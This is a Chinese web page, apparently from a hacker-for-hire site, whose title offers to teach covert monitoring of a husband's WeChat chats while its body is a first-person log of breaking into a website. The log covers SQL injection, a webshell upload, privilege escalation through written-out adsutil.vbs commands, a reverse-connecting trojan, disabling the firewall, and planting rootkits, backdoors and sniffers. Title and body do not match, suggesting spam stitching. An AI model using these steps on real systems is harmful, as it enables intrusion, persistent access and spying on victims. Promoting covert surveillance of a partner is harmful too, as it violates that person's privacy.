怎样查询老公微信聊天记录回答 专业教你如何监控老公

访客3年前关于黑客接单1045

ping 
[url=http://www.xxx.com]www.xxx.com[/url] 
发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。 
二、注入 
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马,接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限,因为这样说可以说在入侵之时会非常的方便,我个人觉得这个 *** 非常好。 
三、提升权限 
先看哪些特权的: 
cscript C:\Inetpub\AdminScripts\adsutil.vbs get /W3SVC/InProcessIsapiApps 
得到: 
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows 
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved. 
InProcessIsapiApps : (LIST) (5 Items) 
"C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" 
"C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" 
"C:\WINNT\system32\msw3prt.dll" 
把把asp.dll加进去: 
cscript C:\Inetpub\AdminScripts\adsutil.vbs 
set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32 
\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32 
\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
然后用asp木马加个用户,显示命令完成。 
四、TerminalService 
接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了,但事实上它们欺骗我的感情。 
我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马。然后用木马在GUI 下关掉了防火墙,再用3389登陆器登了上去。这里我这样做是因为我知道管理员一定不会在旁边,而对于这个时候,比较老道的 *** 大家可以用fpipe实现端口重定向,或者用httptunnel,和黑防里面说的那样,不过我试过没有成功过一次。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies),大家有兴趣的话可以去试一下,它可以穿透http *** 。 
五、简单后门 
1、改了FSO名,这样是让我自己享受,这个有system权限的马儿。 
2、放了几个rootkit和几个 *** 上少见的后台。 
3、我个从是不喜欢多放后台,觉得很烦。 
六、sniffer 
1.TS界面下,down了些嗅探器。先ARPsniffer图形的看了一下,没有一台内网机子。又看了一个外网,整个IP段都是。看来我的运行不错嘛。打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了。 

相关文章

成为黑客的入门知识(如何成为黑客基础入门)-靠谱点的黑客到哪里找

成为黑客的入门知识(如何成为黑客基础入门)-靠谱点的黑客到哪里找

成为黑客的入门知识(如何成为黑客基础入门)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、...

优信员工减薪?优信CTO邱慧离职

优信员工减薪?优信CTO邱慧离职

  优信员工减薪(优信CTO邱慧离职) 过去一年,优信持续流失高管,近期优信CTO邱慧又离职。 邱慧26岁的邱慧加入优信担任CTO,参与孵化优信二手车、优信新车等产品,优信称,邱慧离职后,仍...

国家卫健委:20日新增确诊病例12例 均为境外输入

据国家卫健委网站21日消息,9月20日0—24时,31个省(自治区、直辖市)和新疆生产建设兵团报告新增确诊病例12例,均为境外输入病例(广东3例,内蒙古2例,上海2例,云南2例,陕西2例,福建1例);...

法国确诊病例超246万揭刘汉留下多少遗产 官方通报称马克龙病情稳定

  (抗击新冠肺炎)法国确诊病例超246万 官方通报称马克龙病情稳定   中新社巴黎12月19日电 (记者 李洋)当地时间19日,法国新冠肺炎累计确诊病例超过246万例。法国官方当天通报称,确诊感染...

40淘金币兑换阿里小号1个月,淘金币终于派上用场了

谢谢本站网友yz2n分享,更多优异信息请接见本站论坛。 之前曾经多次分享过关于阿里小号的文章,又叫亲心小号。 可以给自己手机号绑定一个虚拟号码,以到达隐藏真实号码的目的, 同时,也可以用于介入网...

黑客只需手机号码就能定位你?_黑客

黑客如何通过手机号定位你? 北京时间4月19日上午,黑客正在再次证明,不管用户采纳多少信息安全防范措施,黑客只需一个手机号就能够追寻到用户的方位,掌...